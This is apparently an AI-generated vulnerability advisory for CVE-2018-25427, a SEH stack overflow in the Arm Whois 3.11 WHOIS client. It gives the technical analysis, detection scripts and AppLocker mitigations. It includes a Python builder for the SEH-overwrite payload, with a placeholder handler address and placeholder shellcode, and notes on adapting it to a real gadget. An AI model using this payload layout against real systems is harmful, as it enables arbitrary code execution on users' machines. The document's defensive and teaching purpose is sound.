CVE-2018-25427 Overview
CVE-2018-25427 is a stack-based buffer overflow [CWE-121] in Arm Whois 3.11, a Windows desktop WHOIS lookup utility published by ArmCode. The application fails to validate the length of user-supplied input passed to the IP address or domain field. Submitting a string longer than 658 bytes corrupts the stack and overwrites the Structured Exception Handler (SEH) record, allowing attackers to redirect execution to attacker-controlled shellcode. The flaw enables arbitrary code execution in the context of the user running the application.
Critical Impact
Attackers can achieve arbitrary code execution on systems running Arm Whois 3.11 by tricking a user into processing a crafted IP address or domain string.
Affected Products
- ArmCode Arm Whois 3.11 (Windows)
- Earlier versions that share the same input-handling code path (not independently confirmed by the advisory)
- Distributions of arm-whois.exe hosted on the ArmCode website
Discovery Timeline
- 2018-11-08 - Public proof-of-concept released as Exploit-DB #45796
- 2026-06-01 - CVE CVE-2018-25427 published to NVD
- 2026-06-02 - Last updated in NVD database
Technical Details for CVE-2018-25427
Vulnerability Analysis
Arm Whois 3.11 copies user input from its query text field into a fixed-size stack buffer without bounds checking. When the supplied data exceeds 658 bytes, the copy operation walks past the buffer boundary and overwrites adjacent stack data, including the SEH chain stored on the thread's stack. The overflow lets attackers replace both the next SEH (nSEH) pointer and the SEH handler pointer with attacker-chosen values.
The oversized copy commonly raises the exception itself, by running into inaccessible memory beyond the stack; Windows then walks the SEH chain and calls the overwritten handler address. Attackers typically point the handler at a POP POP RET gadget in a module compiled without SafeSEH. The handler is invoked with a pointer to the corrupted EXCEPTION_REGISTRATION_RECORD at [esp+8], so the two POPs and the RET return into the nSEH field, where a 2-byte short forward jump (x86 EB 06) hops over the 4-byte handler address into shellcode placed immediately after the SEH record. The result is arbitrary code execution in the security context of the user who launched Arm Whois.
Root Cause
The root cause is missing input length validation before a stack copy operation. The application trusts the size of the query string and uses an unsafe string routine, classifying the issue under [CWE-121] Stack-based Buffer Overflow. Because the exception is dispatched before the vulnerable function returns, a /GS stack cookie alone would not stop the technique; the controls that do are SafeSEH (the overwritten handler is not in the module's registered handler table) or SEHOP, and the SEH overwrite succeeds here because the gadget module was linked without SafeSEH.
Attack Vector
Exploitation requires the victim to load attacker-supplied data into the IP address or domain input field. Delivery vectors include phishing emails containing crafted text snippets users paste into the tool, malicious files instructing the user to perform a lookup, or wrapper scripts that automate the input. The published proof-of-concept on Exploit-DB constructs a payload of 658 NOPs, a 4-byte nSEH jump, a 4-byte overwritten SEH handler pointing to a POP POP RET gadget, and shellcode that spawns calc.exe or a reverse shell.
See the VulnCheck Advisory for Arm-Whois and Exploit-DB #45796 for technical details.
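The buffer layout described under Attack Vector, as an added worked example (not code from the advisory, the Exploit-DB entry or ArmCode): it assembles filler, the nSEH short jump, the handler pointer and the shellcode at the stated 658-byte offset and checks that the jump lands on the first shellcode byte. The handler address 0x41414141 and the INT3 bytes are placeholders, not a real gadget or payload; the 658 offset comes from the advisory text and the `EB 06` encoding from the x86 instruction set. The NUL-byte check reflects the advisory's statement that the copy uses an unsafe string routine, which would stop at a NUL.

```python
"""Assemble and sanity-check the SEH-overwrite layout for CVE-2018-25427.

Layout (per the advisory): filler | nSEH (short jump) | SEH handler | shellcode
"""
import struct

NSEH_OFFSET = 658                 # bytes of filler before the nSEH field (advisory/PoC value)
SHORT_JMP = b"\xeb\x06\x90\x90"   # x86 JMP rel8 +6, padded with two NOPs to fill the 4-byte nSEH slot


def address_is_usable(addr: int) -> bool:
    """A NUL byte in the pointer would terminate an unsafe C string copy early."""
    return 0 not in struct.pack("<I", addr)


def build_seh_payload(handler_addr: int, shellcode: bytes,
                      nseh_offset: int = NSEH_OFFSET) -> bytes:
    """filler | nSEH | SEH | shellcode, with the handler stored little-endian."""
    if not address_is_usable(handler_addr):
        raise ValueError("handler address contains a NUL byte")
    return b"\x90" * nseh_offset + SHORT_JMP + struct.pack("<I", handler_addr) + shellcode


def jmp_landing_offset(nseh_offset: int = NSEH_OFFSET) -> int:
    """EB 06 is 2 bytes; EIP after it is nseh_offset + 2, and the +6 displacement
    skips the two pad NOPs and the 4-byte handler, landing at nseh_offset + 8."""
    return nseh_offset + 2 + 6


def layout(payload: bytes, nseh_offset: int = NSEH_OFFSET) -> dict:
    """Slice the payload back into its fields for inspection."""
    return {
        "filler": payload[:nseh_offset],
        "nseh": payload[nseh_offset:nseh_offset + 4],
        "seh": payload[nseh_offset + 4:nseh_offset + 8],
        "shellcode": payload[nseh_offset + 8:],
    }


if __name__ == "__main__":
    # 0x41414141 is a placeholder, not a real POP POP RET address; INT3s stand in for shellcode.
    p = build_seh_payload(0x41414141, b"\xcc" * 8)
    fields = layout(p)
    assert p[jmp_landing_offset():] == fields["shellcode"]
    print(len(p), fields["nseh"].hex(), fields["seh"].hex())
```

The landing check is the part worth keeping when adapting this to a real gadget: if the filler length or the nSEH contents change, `jmp_landing_offset()` and `layout()["shellcode"]` must still agree, or the jump lands inside the handler pointer.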
Detection Methods for CVE-2018-25427
Indicators of Compromise
- Presence of arm-whois.exe version 3.11 on workstations (an exposure indicator rather than evidence of compromise), especially those used by analysts performing domain or IP lookups
- Crash dumps from arm-whois.exe referencing access violations at attacker-controlled addresses or corrupted SEH records
- Child processes spawned by arm-whois.exe such as cmd.exe, powershell.exe, or calc.exe without legitimate operational reason
- Outbound network connections originating from arm-whois.exe to non-WHOIS endpoints (TCP/43 is the legitimate WHOIS port)
Detection Strategies
- Inventory endpoints for installations of arm-whois.exe and flag any matching the vulnerable 3.11 build hash
- Alert on process creation events where arm-whois.exe is the parent of an interactive shell or scripting host
- Monitor for unhandled exceptions and crashes in arm-whois.exe that may indicate exploitation attempts
Monitoring Recommendations
- Forward Windows Error Reporting data and Sysmon Event ID 1 (process creation), 3 (network connection) and 11 (file creation) records for the arm-whois.exe image path to a central SIEM
- Track file write events that place arm-whois.exe in user-writable directories, which indicates unmanaged copies of the tool outside the standard install path
- Review egress traffic from hosts running the tool for connections outside TCP/43 WHOIS servers
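The process-tree, egress and file-drop checks from the Detection Strategies and Monitoring Recommendations above, run over constructed Sysmon-style records as an added example (not part of the original advisory or ArmCode's software). The field names mirror Sysmon's Event ID 1, 3 and 11 schema; the sample records, the list of shell images and the user-writable path fragments are assumptions chosen for the demonstration.

```python
"""Triage constructed Sysmon-style records for the CVE-2018-25427 indicators above."""
from dataclasses import dataclass

TOOL = "arm-whois.exe"
WHOIS_PORT = 43
# Assumed set of interactive shells / scripting hosts worth alerting on as children of the tool.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "calc.exe"}
# Assumed path fragments treated as user-writable locations.
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\appdata\\", "\\programdata\\")

# Constructed sample records (not real telemetry). Keys mirror Sysmon fields for
# Event ID 1 (process create), 3 (network connect) and 11 (file create).
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Program Files\ArmCode\arm-whois.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 3, "Image": r"C:\Program Files\ArmCode\arm-whois.exe",
     "DestinationIp": "192.0.2.10", "DestinationPort": 43},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\ArmCode\arm-whois.exe"},
    {"EventID": 3, "Image": r"C:\Program Files\ArmCode\arm-whois.exe",
     "DestinationIp": "198.51.100.7", "DestinationPort": 4444},
    {"EventID": 11, "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Users\analyst\Downloads\arm-whois.exe"},
]


@dataclass
class Alert:
    rule: str
    detail: str


def basename(path: str) -> str:
    """Last path component, lower-cased, so comparisons ignore install location and case."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(events) -> list:
    """Return one Alert per record matching a detection strategy; benign records yield nothing."""
    alerts = []
    for ev in events:
        eid = ev.get("EventID")
        image = basename(ev.get("Image", ""))
        if eid == 1 and basename(ev.get("ParentImage", "")) == TOOL and image in SHELLS:
            alerts.append(Alert("child-shell", f"{TOOL} spawned {image}"))
        elif eid == 3 and image == TOOL and ev.get("DestinationPort") != WHOIS_PORT:
            alerts.append(Alert("non-whois-egress",
                                f"{TOOL} -> {ev.get('DestinationIp')}:{ev.get('DestinationPort')}"))
        elif eid == 11:
            target = ev.get("TargetFilename", "")
            if basename(target) == TOOL and any(frag in target.lower() for frag in USER_WRITABLE):
                alerts.append(Alert("unmanaged-copy", f"{TOOL} written to {target}"))
    return alerts


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(f"[{alert.rule}] {alert.detail}")
```

The first two sample records (the tool launched from Explorer and a TCP/43 lookup) produce no alert, which is the baseline a real deployment has to preserve; the egress rule keys on the destination port only, so a legitimate WHOIS server reached on a non-standard port would need an allow-list entry.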
How to Mitigate CVE-2018-25427
Immediate Actions Required
- Uninstall Arm Whois 3.11 from all endpoints until a fixed build is confirmed available
- Block execution of arm-whois.exe using application control policies such as Windows Defender Application Control or AppLocker
- Restrict outbound TCP/43 traffic to approved WHOIS servers; this does not block the local input overflow itself, but it constrains where the tool can reach and makes unexpected egress from it stand out
Patch Information
No vendor patch is currently referenced in the NVD entry or the VulnCheck Advisory for Arm-Whois. Users should consult the ArmCode Homepage for any updated release. If no fixed version is published, migrate to an actively maintained WHOIS client, for example the Microsoft Sysinternals whois utility (a separate download, not a built-in Windows component).
Workarounds
- Replace Arm Whois with a maintained alternative such as Sysinternals whois.exe or a web-based WHOIS service
- Run the tool only inside a non-privileged sandbox or virtual machine isolated from production data
- Do not paste untrusted text snippets or file contents into the Arm Whois input field; train analysts to submit only validated IP address and domain strings
# AppLocker Deny rule for the vulnerable binary (New-AppLockerPolicy has no -Action/-Path parameters, so the rule is authored as policy XML and merged)
$rule = @"
<AppLockerPolicy Version="1"><RuleCollection Type="Exe" EnforcementMode="Enabled"><FilePathRule
 Id="$([guid]::NewGuid())" Name="Block-ArmWhois-CVE-2018-25427" Description="" UserOrGroupSid="S-1-1-0" Action="Deny">
<Conditions><FilePathCondition Path="%PROGRAMFILES%\ArmCode\arm-whois.exe" /></Conditions></FilePathRule></RuleCollection></AppLockerPolicy>
"@
$rule | Set-Content -Path "$env:TEMP\Block-ArmWhois.xml"
Set-AppLockerPolicy -XmlPolicy "$env:TEMP\Block-ArmWhois.xml" -Merge   # enforced only while the Application Identity service runs
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.


